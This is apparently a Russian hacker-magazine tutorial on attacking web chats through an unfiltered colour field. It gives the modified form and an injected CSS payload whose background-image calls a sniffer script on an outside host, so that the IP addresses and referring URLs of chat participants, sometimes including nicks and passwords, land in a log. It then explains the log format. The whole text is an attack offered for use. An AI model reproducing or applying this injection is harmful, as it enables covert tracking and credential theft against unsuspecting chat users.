Что, дружок, начитался
рассказов, как вставлять в чаты картинки? Только
вот после ввода в чате <img src=megaporno.jpg> ничего не
происходит, а все присутствующие хором кричат в
твою сторону "14m0"? Правильно, теги в чатах
оставляли в 80-х годах, теперь все по-другому. Но
нередко админы забывают про дырку с цветом.
Сначала давай разберемся, что
же это за дырка такая. Когда ты выбираешь
настройки чата, обычно существует возможность
выбора цвета. Сохраняем эту страничку на диск и
открываем ее Блокнотиком. Находим что-то вроде
этого:
<FORM ACTION="/cgi-bin/chat.cgi" METHOD="POST">
<input name="name" type="text">
<select name="color">
<option value="#FF0000">Красный</option>
<option value="#00FF00">Зеленый</option>
</select>
<input name="submit">
</FORM>
Изменяем строчку
ACTION="/cgi-bin/chat.cgi" на
ACTION="http://www.hackedsite.ru/cgi-bin/chat.cgi" и <option
value="#FF0000">Красный</option> на
<option="#0000FF">Синий</option>. Заходим в чат.
Пишем синим? Ага. Даже если не пишем, все равно.
Теперь изменяем строчку <option
value="0000FF">Синий</option> на <option value="#0000FF;
style="height:1;font-size:1pt;background-image:
url('http://www.hackzone.ru/cgi-bin/sniff.cgi?xakep')">ХАК</option>.
Я смотрю, твои слабенькие ручки замучались
писать. Училка в школе заставляет, так еще тут?
Остынь, я пока расскажу, что же мы понаписали. "
- означает ставку кавычек. Кавычки нужны, чтобы
закрыть параметр <font color="#0000FF". Как видишь,
тег не закрыт, и мы можем в нем поковыряться.
Ковыряйся, не ковыряйся, а без CSS (Cascading Style Sheets) в
теге font можно изменить только параметры color-цвет,
size-размер и face-тип шрифта. А вот CSS позволяет
многое. Итак, ты понял, что значит style=" -
начало CSS. Дальше идут параметры стилей:
- height:1; означает, что
максимальная высота слоя шрифта не более 1
пиксела. - font-size:1pt; означает, что размер
шрифта в слое 1-го размера. - background-image:
url('http://www.hackzone.ru/cgi-bin/sniff.cgi?xakep') означает то, что
фоновое изображение для слоя шрифта будет sniffer от
HACKZONE.
После входа в чат, напиши что-нибудь.
Никто ничего не увидит, кроме маленьких точек.
Все IP участников чата, а также URL их страничек (нередко
содержащих ник и пароль к нему), где был показан
твой sniffer будут лежать в логе http://www.hackzone.ru/files/snifflog.txt.
Теперь о формате лога. Каждая его
строчка выглядит примерно так:
[Sat 0:00am] (xakep) 192.168.87.1
[http://www.hackedsite.ru/cgi-bin/messages.cgi?id=nuncuk]
Расшифровка.
[Sat 0:00am] - дата и время, когда была
просмотрена картинка-sniffer.
(xakep) - id sniffer'а (берется из http://www.hackzone.ru/cgi-bin/sniff.cgi?xakep).
192.168.87.1 - IP-адрес посмотревшего
картинку-sniffer.
[http://www.hackedsite.ru/cgi-bin/messages.cgi?id=nuncuk] -
страничка, на которой был просмотрен sniffer.
Все, теперь ты настоящая боевая машина,
способная узнать IP без тегов. Все стандарты CSS
можно почитать на www.w3.org.
Спасибо за внимание, все свободны.
